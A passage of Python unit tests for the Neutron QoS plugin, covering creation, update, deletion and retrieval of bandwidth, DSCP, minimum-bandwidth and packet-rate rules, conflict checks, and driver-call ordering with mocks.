self.qos_plugin.delete_policy(self.ctxt, self.policy.id)
self._validate_driver_params('delete_policy', self.ctxt)
policy_delete_mock_call = mock.call.delete()
delete_precommit_mock_call = mock.call.driver.call(
'delete_policy_precommit', self.ctxt, mock.ANY)
delete_mock_call = mock.call.driver.call(
'delete_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(policy_delete_mock_call) <
mock_manager.mock_calls.index(delete_precommit_mock_call) <
mock_manager.mock_calls.index(delete_mock_call))
@mock.patch.object(policy_object.QosPolicy, "get_object")
@mock.patch.object(rule_object.QosBandwidthLimitRule, 'create')
def test_create_policy_rule(self, mock_qos_rule_create,
mock_qos_policy_get):
_policy = copy.copy(self.policy)
setattr(_policy, "rules", [])
mock_qos_policy_get.return_value = _policy
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_rule_create, 'create')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
with mock.patch('neutron.objects.qos.qos_policy_validator'
'.check_bandwidth_rule_conflict',
return_value=None), \
mock.patch(
'neutron.objects.qos.qos_policy_validator'
'.check_min_pps_rule_conflict', return_value=None):
self.qos_plugin.create_policy_bandwidth_limit_rule(
self.ctxt, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
rule_create_mock_call = mock.call.create()
update_precommit_mock_call = mock.call.driver.call(
'update_policy_precommit', self.ctxt, mock.ANY)
update_mock_call = mock.call.driver.call(
'update_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(rule_create_mock_call) <
mock_manager.mock_calls.index(update_precommit_mock_call) <
mock_manager.mock_calls.index(update_mock_call))
def test_create_policy_rule_check_rule_min_less_than_max(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.qos_plugin.create_policy_minimum_bandwidth_rule(
self.ctxt, _policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
self.mock_qos_load_attr.assert_called_once_with('rules')
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_create_policy_rule_check_rule_max_more_than_min(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_bw_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.qos_plugin.create_policy_bandwidth_limit_rule(
self.ctxt, _policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
self.mock_qos_load_attr.assert_called_once_with('rules')
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_create_policy_rule_check_rule_bwlimit_less_than_minbw(self):
_policy = self._get_policy()
self.rule_data['bandwidth_limit_rule']['max_kbps'] = 1
setattr(_policy, "rules", [self.min_bw_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(qos_exc.QoSRuleParameterConflict,
self.qos_plugin.create_policy_bandwidth_limit_rule,
self.ctxt, self.policy.id, self.rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_create_policy_rule_check_rule_minbw_gr_than_bwlimit(self):
_policy = self._get_policy()
self.rule_data['minimum_bandwidth_rule']['min_kbps'] = 1000000
setattr(_policy, "rules", [self.rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(qos_exc.QoSRuleParameterConflict,
self.qos_plugin.create_policy_minimum_bandwidth_rule,
self.ctxt, self.policy.id, self.rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_create_policy_rule_duplicates(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.rule])
new_rule_data = {
'bandwidth_limit_rule': {
'max_kbps': 5000,
'direction': self.rule.direction
}
}
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(
qos_exc.QoSRulesConflict,
self.qos_plugin.create_policy_bandwidth_limit_rule,
self.ctxt, _policy.id, new_rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
@mock.patch.object(rule_object.QosBandwidthLimitRule, 'update')
def test_update_policy_rule(self, mock_qos_rule_update):
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_rule_update, 'update')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
setattr(_policy, "rules", [self.rule])
with mock.patch('neutron.objects.qos.rule.get_rules',
return_value=[self.rule]), mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.rule_data['bandwidth_limit_rule']['max_kbps'] = 1
self.qos_plugin.update_policy_bandwidth_limit_rule(
self.ctxt, self.rule.id, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
rule_update_mock_call = mock.call.update()
update_precommit_mock_call = mock.call.driver.call(
'update_policy_precommit', self.ctxt, mock.ANY)
update_mock_call = mock.call.driver.call(
'update_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(rule_update_mock_call) <
mock_manager.mock_calls.index(update_precommit_mock_call) <
mock_manager.mock_calls.index(update_mock_call))
def test_update_policy_rule_check_rule_min_less_than_max(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.update_policy_bandwidth_limit_rule(
self.ctxt, self.rule.id, self.policy.id, self.rule_data)
self.mock_qos_load_attr.assert_called_once_with('rules')
self._validate_driver_params('update_policy', self.ctxt)
rules = [self.rule, self.min_bw_rule]
setattr(_policy, "rules", rules)
self.mock_qos_load_attr.reset_mock()
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.update_policy_minimum_bandwidth_rule(
self.ctxt, self.min_bw_rule.id,
self.policy.id, self.rule_data)
self.mock_qos_load_attr.assert_called_once_with('rules')
self._validate_driver_params('update_policy', self.ctxt)
def test_update_policy_rule_check_rule_bwlimit_less_than_minbw(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.update_policy_bandwidth_limit_rule(
self.ctxt, self.rule.id, self.policy.id, self.rule_data)
self.mock_qos_load_attr.assert_called_once_with('rules')
self._validate_driver_params('update_policy', self.ctxt)
self.rule_data['minimum_bandwidth_rule']['min_kbps'] = 1000
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.assertRaises(
qos_exc.QoSRuleParameterConflict,
self.qos_plugin.update_policy_minimum_bandwidth_rule,
self.ctxt, self.min_bw_rule.id,
self.policy.id, self.rule_data)
def test_update_policy_rule_check_rule_minbw_gr_than_bwlimit(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_bw_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.update_policy_minimum_bandwidth_rule(
self.ctxt, self.min_bw_rule.id, self.policy.id,
self.rule_data)
self.mock_qos_load_attr.assert_called_once_with('rules')
self._validate_driver_params('update_policy', self.ctxt)
self.rule_data['bandwidth_limit_rule']['max_kbps'] = 1
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.assertRaises(
qos_exc.QoSRuleParameterConflict,
self.qos_plugin.update_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id,
self.policy.id, self.rule_data)
def _get_policy(self):
return policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
def test_update_policy_rule_bad_policy(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [])
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.update_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id, self.policy.id,
self.rule_data)
@mock.patch.object(rule_object.QosBandwidthLimitRule, 'delete')
def test_delete_policy_rule(self, mock_qos_rule_delete):
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_rule_delete, 'delete')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.rule])
self.qos_plugin.delete_policy_bandwidth_limit_rule(
self.ctxt, self.rule.id, _policy.id)
self._validate_driver_params('update_policy', self.ctxt)
rule_delete_mock_call = mock.call.delete()
update_precommit_mock_call = mock.call.driver.call(
'update_policy_precommit', self.ctxt, mock.ANY)
update_mock_call = mock.call.driver.call(
'update_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(rule_delete_mock_call) <
mock_manager.mock_calls.index(update_precommit_mock_call) <
mock_manager.mock_calls.index(update_mock_call))
def test_delete_policy_rule_bad_policy(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [])
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.delete_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id, _policy.id)
def test_get_policy_bandwidth_limit_rule(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosBandwidthLimitRule.'
'get_object') as get_object_mock:
self.qos_plugin.get_policy_bandwidth_limit_rule(
self.ctxt, self.rule.id, self.policy.id)
get_object_mock.assert_called_once_with(self.ctxt,
id=self.rule.id)
def test_get_policy_bandwidth_limit_rules_for_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosBandwidthLimitRule.'
'get_objects') as get_objects_mock:
self.qos_plugin.get_policy_bandwidth_limit_rules(
self.ctxt, self.policy.id)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY, qos_policy_id=self.policy.id)
def test_get_policy_bandwidth_limit_rules_for_policy_with_filters(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosBandwidthLimitRule.'
'get_objects') as get_objects_mock:
filters = {'filter': 'filter_id'}
self.qos_plugin.get_policy_bandwidth_limit_rules(
self.ctxt, self.policy.id, filters=filters)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY,
qos_policy_id=self.policy.id,
filter='filter_id')
def test_get_policy_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy,
self.ctxt, self.policy.id)
def test_get_policy_bandwidth_limit_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id, self.policy.id)
def test_get_policy_bandwidth_limit_rules_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_bandwidth_limit_rules,
self.ctxt, self.policy.id)
def test_create_policy_dscp_marking_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.dscp_rule])
self.qos_plugin.create_policy_dscp_marking_rule(
self.ctxt, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_update_policy_dscp_marking_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.dscp_rule])
self.qos_plugin.update_policy_dscp_marking_rule(
self.ctxt, self.dscp_rule.id, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_delete_policy_dscp_marking_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.dscp_rule])
self.qos_plugin.delete_policy_dscp_marking_rule(
self.ctxt, self.dscp_rule.id, self.policy.id)
self._validate_driver_params('update_policy', self.ctxt)
def test_get_policy_dscp_marking_rules(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosDscpMarkingRule.'
'get_objects') as get_objects_mock:
self.qos_plugin.get_policy_dscp_marking_rules(
self.ctxt, self.policy.id)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY, qos_policy_id=self.policy.id)
def test_get_policy_dscp_marking_rules_for_policy_with_filters(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosDscpMarkingRule.'
'get_objects') as get_objects_mock:
filters = {'filter': 'filter_id'}
self.qos_plugin.get_policy_dscp_marking_rules(
self.ctxt, self.policy.id, filters=filters)
get_objects_mock.assert_called_once_with(
self.ctxt, qos_policy_id=self.policy.id,
_pager=mock.ANY, filter='filter_id')
def test_get_policy_dscp_marking_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_dscp_marking_rule,
self.ctxt, self.dscp_rule.id, self.policy.id)
def test_get_policy_dscp_marking_rules_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_dscp_marking_rules,
self.ctxt, self.policy.id)
def test_get_policy_minimum_bandwidth_rule(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumBandwidthRule.'
'get_object') as get_object_mock:
self.qos_plugin.get_policy_minimum_bandwidth_rule(
self.ctxt, self.rule.id, self.policy.id)
get_object_mock.assert_called_once_with(self.ctxt,
id=self.rule.id)
def test_get_policy_minimum_bandwidth_rules_for_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumBandwidthRule.'
'get_objects') as get_objects_mock:
self.qos_plugin.get_policy_minimum_bandwidth_rules(
self.ctxt, self.policy.id)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY, qos_policy_id=self.policy.id)
def test_get_policy_minimum_bandwidth_rules_for_policy_with_filters(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumBandwidthRule.'
'get_objects') as get_objects_mock:
filters = {'filter': 'filter_id'}
self.qos_plugin.get_policy_minimum_bandwidth_rules(
self.ctxt, self.policy.id, filters=filters)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY,
qos_policy_id=self.policy.id,
filter='filter_id')
def test_get_policy_minimum_bandwidth_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_minimum_bandwidth_rule,
self.ctxt, self.rule.id, self.policy.id)
def test_get_policy_minimum_bandwidth_rules_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_minimum_bandwidth_rules,
self.ctxt, self.policy.id)
def test_create_policy_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.create_policy_bandwidth_limit_rule,
self.ctxt, self.policy.id, self.rule_data)
def test_update_policy_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.update_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id, self.policy.id, self.rule_data)
def test_delete_policy_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.delete_policy_bandwidth_limit_rule,
self.ctxt, self.rule.id, self.policy.id)
def test_verify_bad_method_call(self):
self.assertRaises(AttributeError, getattr, self.qos_plugin,
'create_policy_bandwidth_limit_rules')
def test_get_rule_type(self):
admin_ctxt = context.get_admin_context()
drivers_details = [{
'name': 'fake-driver',
'supported_parameters': [{
'parameter_name': 'max_kbps',
'parameter_type': lib_constants.VALUES_TYPE_RANGE,
'parameter_range': {'start': 0, 'end': 100}
}]
}]
with mock.patch.object(
qos_plugin.QoSPlugin, "supported_rule_type_details",
return_value=drivers_details
):
rule_type_details = self.qos_plugin.get_rule_type(
admin_ctxt, qos_consts.RULE_TYPE_BANDWIDTH_LIMIT)
self.assertEqual(
qos_consts.RULE_TYPE_BANDWIDTH_LIMIT,
rule_type_details['type'])
self.assertEqual(
drivers_details, rule_type_details['drivers'])
def test_get_rule_type_as_user(self):
self.assertRaises(
lib_exc.NotAuthorized,
self.qos_plugin.get_rule_type,
self.ctxt, qos_consts.RULE_TYPE_BANDWIDTH_LIMIT)
def test_get_rule_types(self):
filters = {'type': 'type_id'}
with mock.patch.object(qos_plugin.QoSPlugin, 'supported_rule_types',
return_value=qos_consts.VALID_RULE_TYPES):
types = self.qos_plugin.get_rule_types(self.ctxt, filters=filters)
self.assertEqual(sorted(qos_consts.VALID_RULE_TYPES),
sorted(type_['type'] for type_ in types))
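# Iterates create/update/delete of a generic rule and asserts that the rule
# object operation always precedes the 'update_policy' driver call.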
@mock.patch('neutron.objects.ports.Port')
@mock.patch('neutron.objects.qos.policy.QosPolicy')
def test_rule_notification_and_driver_ordering(self, qos_policy_mock,
port_mock):
rule_cls_mock = mock.Mock()
rule_cls_mock.rule_type = 'fake'
rule_actions = {'create': [self.ctxt, rule_cls_mock,
self.policy.id, {'fake_rule': {}}],
'update': [self.ctxt, rule_cls_mock,
self.rule.id,
self.policy.id, {'fake_rule': {}}],
'delete': [self.ctxt, rule_cls_mock,
self.rule.id, self.policy.id]}
mock_manager = mock.Mock()
mock_manager.attach_mock(qos_policy_mock, 'QosPolicy')
mock_manager.attach_mock(port_mock, 'Port')
mock_manager.attach_mock(rule_cls_mock, 'RuleCls')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
for action, arguments in rule_actions.items():
mock_manager.reset_mock()
method = getattr(self.qos_plugin, "%s_policy_rule" % action)
method(*arguments)
# some actions get rule from policy
get_rule_mock_call = getattr(
mock.call.QosPolicy.get_policy_obj().get_rule_by_id(),
action)()
# some actions construct rule from class reference
rule_mock_call = getattr(mock.call.RuleCls(), action)()
driver_mock_call = mock.call.driver.call('update_policy',
self.ctxt, mock.ANY)
if rule_mock_call in mock_manager.mock_calls:
action_index = mock_manager.mock_calls.index(rule_mock_call)
else:
action_index = mock_manager.mock_calls.index(
get_rule_mock_call)
self.assertLess(
action_index, mock_manager.mock_calls.index(driver_mock_call))
def test_create_policy_packet_rate_limit_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.pps_rule])
self.qos_plugin.create_policy_packet_rate_limit_rule(
self.ctxt, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_create_policy_pps_rule_duplicates(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.pps_rule])
new_rule_data = {
'packet_rate_limit_rule': {
'max_kpps': 400,
'direction': self.pps_rule.direction
}
}
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(
qos_exc.QoSRulesConflict,
self.qos_plugin.create_policy_packet_rate_limit_rule,
self.ctxt, _policy.id, new_rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_update_policy_packet_rate_limit_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.pps_rule])
self.qos_plugin.update_policy_packet_rate_limit_rule(
self.ctxt, self.pps_rule.id, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_update_policy_pps_rule_bad_policy(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [])
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.update_policy_packet_rate_limit_rule,
self.ctxt, self.pps_rule.id, self.policy.id,
self.rule_data)
def test_delete_policy_packet_rate_limit_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.pps_rule])
self.qos_plugin.delete_policy_packet_rate_limit_rule(
self.ctxt, self.pps_rule.id, self.policy.id)
self._validate_driver_params('update_policy', self.ctxt)
def test_delete_policy_pps_rule_bad_policy(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [])
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.delete_policy_packet_rate_limit_rule,
self.ctxt, self.pps_rule.id, _policy.id)
def test_get_policy_packet_rate_limit_rule(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosPacketRateLimitRule.'
'get_object') as get_object_mock:
self.qos_plugin.get_policy_packet_rate_limit_rule(
self.ctxt, self.pps_rule.id, self.policy.id)
get_object_mock.assert_called_once_with(self.ctxt,
id=self.pps_rule.id)
def test_get_policy_packet_rate_limit_rules_for_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosPacketRateLimitRule.'
'get_objects') as get_objects_mock:
self.qos_plugin.get_policy_packet_rate_limit_rules(
self.ctxt, self.policy.id)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY, qos_policy_id=self.policy.id)
def test_get_policy_packet_rate_limit_rules_for_policy_with_filters(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosPacketRateLimitRule.'
'get_objects') as get_objects_mock:
filters = {'filter': 'filter_id'}
self.qos_plugin.get_policy_packet_rate_limit_rules(
self.ctxt, self.policy.id, filters=filters)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY,
qos_policy_id=self.policy.id,
filter='filter_id')
def test_get_policy_packet_rate_limit_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_packet_rate_limit_rule,
self.ctxt, self.pps_rule.id, self.policy.id)
def test_get_policy_packet_rate_limit_rules_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_packet_rate_limit_rules,
self.ctxt, self.policy.id)
def test_create_policy_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.create_policy_packet_rate_limit_rule,
self.ctxt, self.policy.id, self.rule_data)
def test_update_policy_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.update_policy_packet_rate_limit_rule,
self.ctxt, self.pps_rule.id, self.policy.id, self.rule_data)
def test_delete_policy_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.delete_policy_packet_rate_limit_rule,
self.ctxt, self.pps_rule.id, self.policy.id)
def test_get_pps_rule_type(self):
admin_ctxt = context.get_admin_context()
drivers_details = [{
'name': 'fake-driver',
'supported_parameters': [{
'parameter_name': 'max_kpps',
'parameter_type': lib_constants.VALUES_TYPE_RANGE,
'parameter_range': {'start': 0, 'end': 100}
}]
}]
with mock.patch.object(
qos_plugin.QoSPlugin, "supported_rule_type_details",
return_value=drivers_details
):
rule_type_details = self.qos_plugin.get_rule_type(
admin_ctxt, qos_consts.RULE_TYPE_PACKET_RATE_LIMIT)
self.assertEqual(
qos_consts.RULE_TYPE_PACKET_RATE_LIMIT,
rule_type_details['type'])
self.assertEqual(
drivers_details, rule_type_details['drivers'])
def test_get_pps_rule_type_as_user(self):
self.assertRaises(
lib_exc.NotAuthorized,
self.qos_plugin.get_rule_type,
self.ctxt, qos_consts.RULE_TYPE_PACKET_RATE_LIMIT)
def test_create_min_pps_rule_on_bound_port(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
segment = network_object.NetworkSegment(
physical_network='fake physnet')
net = network_object.Network(
self.ctxt,
segments=[segment])
port = ports_object.Port(
self.ctxt,
id=uuidutils.generate_uuid(),
network_id=uuidutils.generate_uuid(),
device_owner='compute:fake-zone')
with mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy), \
mock.patch(
'neutron.objects.network.Network.get_object',
return_value=net), \
mock.patch.object(
self.qos_plugin,
'_get_ports_with_policy',
return_value=[port]):
self.assertRaises(
NotImplementedError,
self.qos_plugin.create_policy_minimum_packet_rate_rule,
self.ctxt, _policy.id, self.rule_data)
def test_create_min_pps_rule_on_unbound_port(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
segment = network_object.NetworkSegment(
physical_network='fake physnet')
net = network_object.Network(
self.ctxt,
segments=[segment])
port = ports_object.Port(
self.ctxt,
id=uuidutils.generate_uuid(),
network_id=uuidutils.generate_uuid(),
device_owner='')
with mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy), \
mock.patch(
'neutron.objects.network.Network.get_object',
return_value=net), \
mock.patch.object(
self.qos_plugin,
'_get_ports_with_policy',
return_value=[port]):
try:
self.qos_plugin.create_policy_minimum_packet_rate_rule(
self.ctxt, _policy.id, self.rule_data)
except NotImplementedError:
self.fail()
def test_create_policy_rule_check_rule_min_pps_direction_conflict(self):
_policy = self._get_policy()
self.rule_data['minimum_packet_rate_rule']['direction'] = 'any'
setattr(_policy, "rules", [self.min_pps_rule])
rules = [
{
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 10,
'direction': 'ingress'
}
},
{
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 10,
'direction': 'egress'
}
},
]
for new_rule_data in rules:
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(qos_exc.QoSRuleParameterConflict,
self.qos_plugin.create_policy_minimum_packet_rate_rule,
self.ctxt, self.policy.id, new_rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt,
id=_policy.id)
for rule_data in rules:
min_pps_rule = rule_object.QosMinimumPacketRateRule(
self.ctxt, **rule_data['minimum_packet_rate_rule'])
setattr(_policy, "rules", [min_pps_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(qos_exc.QoSRuleParameterConflict,
self.qos_plugin.create_policy_minimum_packet_rate_rule,
self.ctxt, self.policy.id, self.rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt,
id=_policy.id)
def test_create_policy_min_pps_rule(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.create_policy_minimum_packet_rate_rule(
self.ctxt, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_create_policy_min_pps_rule_duplicates(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
new_rule_data = {
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 1234,
'direction': self.min_pps_rule.direction,
},
}
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(
qos_exc.QoSRulesConflict,
self.qos_plugin.create_policy_minimum_packet_rate_rule,
